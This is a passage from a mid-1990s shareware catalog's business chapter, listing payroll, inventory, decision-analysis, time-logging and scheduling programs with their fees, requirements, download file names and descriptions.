in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 5888 + PsL#: 14036 + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + An invoicing program which also keeps track of parts, + customers, work orders, and personnel. Comes in two versions; + Standard Edition allows you to create work orders and Invoices, + as well as to choose from several pre-defined reports. Deluxe + Edition includes all of the features of the Standard Edition, + plus it gives you the ability to define your own reports, + enabling you to view your data based on any criteria you care + to enter. + + + 7.1.4 Purchase order systems + + Product: DAYO INVENTORY + Inventory control and purchase orders. See full description on + page 336. + + Chapter 7, "Business" 330 + + + + Product: Office Supplies Tracker + Author: RMH Computer Services, 317-782-9903 + Version: 1.42 (03-18-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $39.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; 1-month return policy; all ASP-wide offers (see + page 6). + Look for: OST142.ZIP on BBSs (call 317-784-2147 to download it at + no charge); OST.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 6 + (or contact userID 73567,1547 for assistance). + SWREG#: 2445 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Complete office supplies tracking system. Maintain inventory + listings and quantities, stock locations, generate purchase + orders and purchase requisitions, and maintain vendor listings. + Automatically adjusts in-stock levels when orders are recieved + and posted. Automatic notification when in-stock levels drop + below specified quantities. Includes pop-up calculator and + appointment calendar. Context-sensitive online help. + + + Product: Track-It + Point of sale with inventory control. See full description on + page 323. + + 7.1.5 Payroll systems + + Product: Bottom Line Accounting + Small business accounting software. See full description on + page 311. + + Product: Business Clock Link + Time clock w/ job reporting, E-mail, network. See full + description on page 345. + + Product: DAYO PAYROLL + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 331 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOYE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOYE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Provides a system for the computation of payroll for businesses + of any size. Features include: Multiuser, unlimited employees, + Weekly, BiWeekly, and/or Monthly payrolls, quarterly, year to + date (YTD), and current summary databases, Automatic payroll + posting & computation, vacation, sick pay/days, check printing, + multiple states, SDI tax, overtime & premium hourly wages, up + to 8 deductions, view reports on screen, medicare and many + reports. + + + Product: PC-PR + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 2.4 (02-01-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM. Printer with a + condensed-mode font. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; bonus + data; discounts on other products. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 5 (or contact userID 71520,61 for assistance); + MEDLIN.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A fast, simple payroll writing program. 1994 federal tax + tables and most state tax tables are included. Employees are + automatically sorted in alphabetical order. Allows up to five + deductions per check for 1200 employees. Reports include + employee listing (can be used as payroll input sheet), federal + liability by paydate, quarterly payroll listing, payroll + ledger, payroll check listing, employee history report and + annual W-2's. Supports tips, cafeteria plans and 401K plans. + + + Product: TimeCapture + Employee time clock program with file manager. See full + description on page 348. + + Chapter 7, "Business" 332 + + + + Product: ZIPPER Payroll + Author: SOFTCRAFT, 206-728-8427 + Version: 1.6 (02-28-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: Dot matrix printer. + Registration fee: 62.00US (add 5.00US for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, fax, CompuServe support. 3-month return + policy. 12-month free upgrading allowed. 1 free update disk(s) + nd + sent out. Tax table updates for the 2 year. + Look for: ZPACK*.ZIP on BBSs (multiple files); ZPACK*.ZIP on + CompuServe in CIS:IBMAPP forum LIBrary 5 (multiple files) (or + contact userID 71221,376 for assistance); ZPACK*.ZIP on GEnie + in HOSB forum LIBrary 12 (multiple files). + Download size: 574k (about 43 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Designed from the ground-up for the non-accountant type + business person. Menu driven with auto-config for each state. + Context sensitive help is available at all menu levels. + Includes state and federal tax tables. Optional export to + Quicken(tm). Uses R:Base file format. Unique "Undo" feature + allows easy error correction - even after checks are printed. + Optional password protection with "tattletale" feature. Prints + checks, W-2's, and many reports. Supports all printers. + + + Product: ZPAY 3 + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Version: 3.6 (01-01-93) + Needs: IBM PC, DOS 2.0 or better. 375k RAM, hard disk, printer. + Registration fee: $69.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of toll 900# phone, fax, CompuServe, + GEnie, mail support. + Look for: ZPAY3*.ZIP on BBSs (multiple files); ZPAY3*.ZIP on + CompuServe in CIS:OAFORUM forum LIBrary 4 (multiple files) (or + contact userID 76711,1141 for assistance); ZPAY3*.ZIP on GEnie + in IBMPC forum LIBrary 0 (multiple files) (or contact userID + P.MAYER1 for assistance). + Download size: 604k (about 45 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + The easiest to use and most flexible payroll package for the PC + ever! Pays salaried, hourly, commissioned, 1099 type payments + by any pay period. Prints checks, W2's and a multitude of + reports. Has data exporting so you can manipulate the data + with other applications such as a spreadsheet program. Supports + + Chapter 7, "Business" 333 + + + + laser printers as well as your pin feed printers. Manual has a + "test ride" tutorial to make learning a snap! + + + 7.2 Inventory systems + + Product: Around The House + Complete personal/home information manager. See full + description on page 166. + + Product: Book Librarian + Book cataloging program. See full description on page 522. + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 275. + + Product: DAYO BAR CODE 3 OF 9 + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.55+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM. DAYO Inventory. + Strongly recommended: CGA monitor; Hard disk; HP LaserJet + printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; disks + of other shareware; discounts on other products; discounts on + upgrades. 1-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: DAYO39.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYO39.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Prints 3 of 9 bar codes with an Epson (tm) or IBM (tm) + compatible dot matrix printer. It is integrated with the DAYO + Inventory and the DAYO Customer databases. Labels are printed + onto standard labels (3.5 by 15/16 inches at 6 lines per inch). + The inventory bar code label consists of an item number, its + bar code, vendor item number, description, unit of issue, + weight, and bin/location. The customer bar code label consists + of a customer number, its bar code, customer's name and + telephone. + + Chapter 7, "Business" 334 + + + + Product: DAYO END OF PERIOD + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. DAYO Inventory. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOEE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOEE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Contains routines that are normally run at the end of a + reporting period (ie: month). Permits you to permanently remove + deleted records from the accounts receivable (AR) and accounts + payable (AP) databases, and to erase old report text files. + There is also a routine for performing a physical inventory. + Many reports are included (ie: AR ageing, AP summary, inventory + movement). + + + Product: DAYO INVENTORY + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.56+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOIE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOIE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A multiuser inventory control, purchasing, and vendor + maintenance application. Use it to create and maintain an + inventory of any product. Features include multiuser (ie: + Novell, LANtastic), reports, labels, lists, and a graph. The + ability to upgrade and expand your system is available with the + addition of supporting DAYO products (ie: DAYO POS, DAYO AR, + DAYO AP, etc.). + + Chapter 7, "Business" 335 + + + + Product: DAYO MRP + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-15-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOWE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOWE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + A routine designed for manufacturers. Builds items (end items) + from item (components) in the inventory database. End items can + later be placed into inventory for later sales. Supports multi- + level bill of materials. Features include automatic inventory + posting and creation of inventory adjustment records, databases + are dBASE(tm) compatible, multiuser, and many reports. + + + Product: DAYO RETURN MANAGEMENT SYSTEM + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.00+ (12-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOFE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOFE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Provide the means to record and track returns of your product. + Integrates to DAYO Inventory and its multiple warehouses to + allow tracking of items being returned (ie: breakages, + warranties, return to vendors). Creates RMA numbers. + + Chapter 7, "Business" 336 + + + + Product: Hardware/Software Info Manager + Author: Alpine Software, 214-964-1897 + Version: 1.4 (07-01-93) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $29.95 (Canadian dollars) (add $4.00 (Canadian + dollars) for shipping to U.S. addresses) (add $6.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; HSIM.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (or contact userID 73770,3273 for + assistance). + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + An application designed for computer users both at home or in + the small business to keep track of computer equipment and + software. Tracks your assets, help determine if an item is + currently under warranty and plus more. Fully configurable + including screen colors and user defined report generator to + design your own reports with. + + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 377. + + Product: Household Register + Home/office inventory program. See full description on + page 590. + + Product: ICP + Author: Spirit7 Software, Ltd., 703-943-4635 + Version: 11 (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; VGA monitor; + Hercules monitor; Hard disk. + Registration fee: $65.00 (add $8.00 for shipping to Canadian + addresses) (add $12.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, newsletter, mail support; bonus + utilities; all ASP-wide offers (see page 6). + Look for: ICP11.ZIP on BBSs (call 703-949-4464 to download it at + no charge); ICP11.ZIP on CompuServe in CIS:IBMAPP forum LIBrary + 6 (or contact userID 73530,3236 for assistance). + Download size: 480k (about 36 minutes with a 2400 baud modem) + Description: + A full-featured, general purpose inventory control system with + modules to sell, order, and receive inventory. Features complex + filtering (segmenting) of the data base by using the "and/or" + logical operators. Supports LIFO, FIFO, and weighted average + costing. Supports composite inventory (inventory items + consisting of other inventory items) and serialized inventory. + + Chapter 7, "Business" 337 + + + + Can be upgraded to complete point-of-sale system (PICS) at any + time with no loss of data. Optional bar code module. + + + Product: Inventory Interface + Author: Data Interface, 313-981-3615 + Version: 7.25 (04-01-95) + Needs: IBM AT (80286), DOS 3.3 or better. 500k RAM; Hard disk. + Strongly recommended: XMS memory. + Registration fee: $165.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; discounts on upgrades. + 12-month free upgrading allowed. 2 free update disk(s) sent + out. + Look for: II7*.ZIP on BBSs; II7*.ZIP on CompuServe in CIS:IBMAPP + forum LIBrary 0 (or contact userID 71344,2354 for assistance). + SWREG#: 3133 + Download size: 620k (about 46 minutes with a 2400 baud modem) + Description: + An extensive Inventory, POS, and MRP package. Completely + integrated within the package are modules for inventory, bill + of materials, work orders, sales / order processing, AR, AP, + purchase orders, quotes, and request for quotes. Easy to use + table interface includes pick list for key values with online + help. Supports FIFO or LIFO inventory usage. All forms and + reports can be customized by the user. No preprinted forms are + necessary, but are supported. + + + Product: JRE Home Inventory + Log household items for insurance purposes. See full + description on page 617. + + Product: LABELS-PLUS Labeling System + Bar code label print system. See full description on page 94. + + Product: Layout + Author: Software Co-op, 317-856-6052 + Version: 3.1 (03-25-92) + Needs: IBM PC, DOS 2.0 or better. CGA monitor, IBM/Epson FX or + HP LaserJet printer. + Registration fee: $35.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support. + Look for: LAYOUT.ZIP on BBSs (call 715-652-2758 to download it at + no charge); LAYOUT.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 76635,1670 for assistance). + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + Keeps graphics layout of office furniture and equipment by room + and a database objects, each with 6 free-form fields. Multiple + rooms can be grouped together to form units such as + departmental charge areas. Inventory reports and export of data + + Chapter 7, "Business" 338 + + + + to comma-delimited files for transfer to database programs or + spreadsheets. Data entry is via a mini-CAD system. Makes nice + printed room layouts. Solid system without a lot of frills. + Appeals to the office manager with rolled up sleeves. + + + Product: Office Supplies Tracker + Office supplies ordering/inventory system. See full + description on page 329. + + Product: RESTAURANT COST CONTROL + Inventory, purchases & accounts payable. See full description + on page 360. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 133. + + Product: Track-It + Point of sale with inventory control. See full description on + page 323. + + + 7.3 Decision analysis tools + + Product: Bubble Chart + Author: Informatik Inc., 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; BUBBLE.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 11 (or contact userID 76534,1166 + for assistance). + SWREG#: 6324 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Animated chart that dramatizes the changes of a company's + competitive market position versus its competitors. Companies + are represented by colored sphere that move to reflect the + developing growth rate and market share over a period of time. + Companies that move towards the upper right corner are winners; + companies left in the lower left corner are losers. Import from + spread sheets. Save and print functions. Spot important shifts + in market positions at a glance! + + Chapter 7, "Business" 339 + + + + Product: LAPC - Loan Advisor for the PC + Calculate & compare loan values and payments. See full + description on page 394. + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 350. + + Product: Simstat + Complete statistics and simulation program. See full + description on page 448. + + Product: SMALL BUSINESS ADVISOR + Expert tax/legal help for small businesses. See full + description on page 369. + + Product: TreePlan for DOS + Author: Decision Support Services, 415-673-6217 + Version: 2.1 (08-12-93) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $29.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support. + Look for: availability unknown on BBSs; TRED21.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 6 (or contact userID 71330,3445 for + assistance). + PsL#: 10904 + Download size: 161k (about twelve minutes with a 2400 baud modem) + Description: + Decision tree software for analyzing risky decisions. Shows + sequence of decisions and events over time. Prints tree + diagrams. Solves for optimal strategy. Performs sensitivity + analysis of probability, value, and risk attitude. Includes + exponential utility, automatic EVPI, Bayes revision, and 500 + lines of context-sensitive on-screen help. User manual has + complete command reference, step-by-step tutorial, and two + application examples explaining decision tree concepts and + terminology. + + Chapter 7, "Business" 340 + + + + Product: UDECIDE + Author: Cascoly Software, 206-523-6135 + Version: 1.06 (11-10-92) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; UDCIDE.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 7 (or contact userID 76703,3046 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Helps you make decisions such as which software or hardware to + purchase; ratings surveys; which project to pursue; selecting + colleges, movies, stocks, or wines. You enter a list of + elements to evaluate the contenders, giving each a weight. Then + you enter the options, assigning values to each element. Then + sort to obtain an ordered list of the best options. Or perform + what-if analyses by changing elements or weights. + + + 7.4 Equipment use & maintenance + + Product: Chris's Automobile Recorder + Vehicle operation & maint. logger & reminder. See full + description on page 638. + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 275. + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 377. + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 409. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 116. + + Chapter 7, "Business" 341 + + + + Product: Vehicle Costs + Author: Graham Ferguson, +61-3-700-3764 + Version: 2.4 (05-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + Hard disk. + Strongly recommended: Epson printer. + Registration fee: $US50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; disks of other shareware. + Look for: availability unknown on BBSs; VEHI24.ZIP on CompuServe + in CIS:CARS forum LIBrary 2 (or contact userID 100026,370 for + assistance). + SWREG#: 2619 + Download size: 146k (about eleven minutes with a 2400 baud modem) + Description: + Reports on costs by category or item over a range of years. + Records fuel cost and consumption. Yearly average cost per mile + price per gallon. No limit to number of vehicles recorded. + Yearly totals of fuel purchased, distance traveled, cost of + parts and service. Notepad to record service and trip details. + Database editor for entry error correction. Tax file to record + Business deductable travel. Suitable for private or fleet use. + + + Product: x-SKED3 + Network room/resource scheduling system. See full description + on page 434. + + 7.4.1 Computer-use logging + + Product: JobLog Project Timekeeper + Author: Brian Sutton, 813-920-0882 + Version: 2.0 (05-08-95) + Needs: IBM PC, DOS 2.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; Mouse; Epson printer. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 6 months of CompuServe, GEnie, mail + support; discounts on upgrades. + Look for: LOG20.ZIP on BBSs; LOGF20.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 0 (or contact userID 73160,676 for + assistance); LOG20.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID B.SUTTON1 for assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Designed to help you keep track of how you spend your computer + time. It is simple to use whether it be from the DOS prompt, a + batch file, or through the menu systems. With it, you can log + + Chapter 7, "Business" 342 + + + + project times automatically, without user input. Great for + people who bill for their computer work. Sends reports the + printer or to a disk file for input to your favorite word + processor. + + + Product: PUBLIC ACCESS(tm) + Author: IN/QUEST, LLC, 303-671-0800 + Version: 2.5 (09-05-94) + Needs: IBM PC, DOS 2.11 or better. 620k RAM; Hard disk. + Strongly recommended: VGA monitor; Hercules monitor; Modem; + Mouse; Epson printer. Procomm Plus v2.x; magnetic swipe + reader; PRODIGY service. + Registration fee: $89.00 (add $5.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter support; 1-month + return policy; runtime license; site license; bonus utilities; + all ASP-wide offers (see page 6); discounts on other products. + 2-month free upgrading allowed. 2 free update disk(s) sent + out. + Look for: PACCS25.EXE on BBSs (multiple files) (call 303-665-6091 + to download it at no charge); PACCS*.EXE on CompuServe in + CIS:IBMAPP forum LIBrary 6 (multiple files) (or contact userID + 70505,531 for assistance); PACCS*.EXE on GEnie in IBMPC forum + LIBrary 4 (multiple files) (or contact userID XTY25572 for + assistance). + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Front-end control menu for public libraries and other business + entities offering casual PC use to the general public. Will + launch any DOS or MS-Windows based programs. Site may offer + controlled access to application programs and (via modem) to + online data communications (if you have PCPLUS 2.01). Up to 12 + step autologon. Patrons pay with cash or credit card. Credit + cards are pre-validated before access allowed. Set rates by + the minute, long distance minute, page, session, and overall + event. + + + Product: TimeClock + Author: KMR Consulting, 716-293-3241 + Version: 1.1 (11-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $17.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, mail support; + bonus utilities; disks of other shareware; discounts on + + Chapter 7, "Business" 343 + + + + upgrades; registration commissions. 1 free update disk(s) sent + out. + Look for: TIMCLK11.ZIP on BBSs; TIMCLK.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 74034,1441 for + assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Keeps track of the time you've spent on your computer. Time is + charged to one or more "projects" of your choosing by "punching + in" when you begin work. In addition, projects may be grouped + in different categories, such as business and pleasure. Usage + can then be summarized by project and category, giving total + hours and percentage of use for each project and category. This + is the information you need to justify a deduction for business + use of your computer. + + + 7.5 Employee management/scheduling + + Product: Business Clock Link + Author: BizMark Development, 318-949-4399 + Version: 1.00 (12-06-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $175.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. + Look for: availability unknown on BBSs; BCLINK.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 6 (or contact userID 70262,114 for + assistance). + PsL#: 11665 + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + A networkable PC time clock with real-time job reporting + system, "blue collar" E-mail, clock-in/out animation, on-line + worker discipline, and "ticker tape" reporting of all + transactions. Written in C with dBASE file format. Oriented + toward the needs of Managers, so it is called "The Clock That + Means Business". Great use for old XT's. + + Chapter 7, "Business" 344 + + + + Product: Calendar Quick + Author: Logic Pulse + Version: 2.0 (12-08-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; VGA + monitor; Hard disk. + Strongly recommended: HP LaserJet printer. + Registration fee: $24.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; bonus utilities; all ASP-wide offers + (see page 6). Lifetime free upgrading allowed. + Look for: CALQCK20.ZIP on BBSs; CALQCK.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 12 (or contact userID 73313,3443 for + assistance). + SWREG#: 4042 + PsL#: 11711 + Download size: 375k (about 28 minutes with a 2400 baud modem) + Description: + A fast, feature-rich calendar and schedule manager for Windows + users. Suitable for use by either individuals, workgroups, or + full enterprises. Creates weekly and monthly calendars in color + or black and white. Also creates daily itineraries and time + lines suitable for use in project management. Easy integration + with other programs via Clipboard. A unigue "Tickler" tracks + future events, while a built-in alarm clock gets you out the + door on time. Also: "Balloon Help," popup menus, & notebook + tabs. + + + Product: ChronoLog + Personal info/resource mgmt system for DOS. See full + description on page 167. + + Product: DAYO SERVICE DISPATCH + Manage service & repair work; dispatch tech. See full + description on page 350. + + Product: Flexitime/Time Logging + Author: HJS Systems, +44-(0)1203-388031 + Version: 5.32 (06-01-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk. + Registration fee: L-35.00 (add L-10.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, mail support; 1-month return policy; LAN + + Chapter 7, "Business" 345 + + + + license; site license; registration commissions. 3-month free + upgrading allowed. + Look for: FTTLV532.ZIP on BBSs (call +44-(0)1203-352326 to + download it at no charge). + SWREG#: 3970 + PsL#: 14086 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + Designed to achieve seamless integration between recording + employee attendance (when they are at work) and what they are + doing with that time. The organisation can then monitor + attendance, holidays, personal and team performance and produce + billing information for clients. Data can also be used by and + exported to other systems. + + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 368. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 378. + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 151. + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 352. + + Product: RagTime for Windows + Event & recreation planner for women (& guys). See full + description on page 151. + + Product: RideMatch + Author: Paradise Programming, 206-866-3781 + Version: 1.0 (11-11-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $75.00 (add $5.00 for shipping to Canadian + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; site license; all ASP-wide offers (see page 6); disks + + Chapter 7, "Business" 346 + + + + of other shareware; discounts on upgrades. 6-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; RIDE.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 15 (or contact userID 70322,231 for + assistance). + Download size: 114k (about nine minutes with a 2400 